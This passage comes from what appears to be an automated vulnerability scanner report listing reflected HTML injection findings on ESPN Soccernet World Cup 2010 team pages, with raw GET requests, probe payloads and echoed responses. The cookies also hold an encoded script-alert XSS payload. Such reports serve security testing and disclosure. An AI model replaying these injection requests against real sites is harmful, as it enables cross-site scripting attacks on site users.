HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:44 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:44 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:31:44 GMT Content-Length: 82073 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Paraguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=210&_slug_=paraguayd453d"><a>904bfdecc42&topId=799269&linktext=Gerardo+Martino+to+remain+as+coach"> ...[SNIP]...
5.70. http://soccernet.espn.go.com/worldcup2010/team/_/team/210/paraguay [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/210/paraguay
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e861b"><a>1c6180afac1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/210/paraguay?e861b"><a>1c6180afac1=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:22:55 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:22:55 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN12 Cache-Expires: Sat, 06 Nov 2010 23:27:55 GMT Content-Length: 82181 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Paraguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=210&e861b"><a>1c6180afac1=1&_slug_=paraguay&e861b"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 416ae"><a>174e4000843 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/212/uruguay416ae"><a>174e4000843 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:29:33 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:29:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:34:33 GMT Content-Length: 81983 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Uruguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=212&_slug_=uruguay416ae"><a>174e4000843&topId=807748&linktext=Germany+finish+in+third+place"> ...[SNIP]...
5.72. http://soccernet.espn.go.com/worldcup2010/team/_/team/212/uruguay [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/212/uruguay
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f178"><a>aa580cad459 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/212/uruguay?2f178"><a>aa580cad459=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:48 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN32 Cache-Expires: Sat, 06 Nov 2010 23:33:48 GMT Content-Length: 82091 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Uruguay Football / ...[SNIP]... <a href="/worldcup2010/team?team=212&2f178"><a>aa580cad459=1&_slug_=uruguay&2f178"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2fd53"><a>9d87ae988a2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/215/honduras2fd53"><a>9d87ae988a2 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:37 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:37 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Cache-Expires: Sat, 06 Nov 2010 23:14:37 GMT Content-Length: 81718 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Honduras Football / ...[SNIP]... <a href="/worldcup2010/team?team=215&_slug_=honduras2fd53"><a>9d87ae988a2&topId=802308&linktext=Coach+happy+after+claiming+point"> ...[SNIP]...
5.74. http://soccernet.espn.go.com/worldcup2010/team/_/team/215/honduras [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/215/honduras
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 914aa"><a>4f86e09379e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/215/honduras?914aa"><a>4f86e09379e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:25 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:13:25 GMT Content-Length: 81826 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Honduras Football / ...[SNIP]... <a href="/worldcup2010/team?team=215&914aa"><a>4f86e09379e=1&_slug_=honduras&914aa"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17070"><a>7043290c14 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/2666/new-zealand17070"><a>7043290c14 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:26:01 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:26:01 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Cache-Expires: Sat, 06 Nov 2010 23:31:01 GMT Content-Length: 82091 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>New Zealand Footbal ...[SNIP]... <a href="/worldcup2010/team?team=2666&_slug_=new-zealand17070"><a>7043290c14&topId=801589&linktext=Coach+delighted+with+unbeaten+run"> ...[SNIP]...
5.76. http://soccernet.espn.go.com/worldcup2010/team/_/team/2666/new-zealand [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/2666/new-zealand
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb3e"><a>31ef275d77e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/2666/new-zealand?6fb3e"><a>31ef275d77e=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:22:18 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:22:18 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN33 Cache-Expires: Sat, 06 Nov 2010 23:27:18 GMT Content-Length: 82203 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>New Zealand Footbal ...[SNIP]... <a href="/worldcup2010/team?team=2666&6fb3e"><a>31ef275d77e=1&_slug_=new-zealand&6fb3e"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b56f"><a>36f0e92eb87 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4469/ghana3b56f"><a>36f0e92eb87 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; 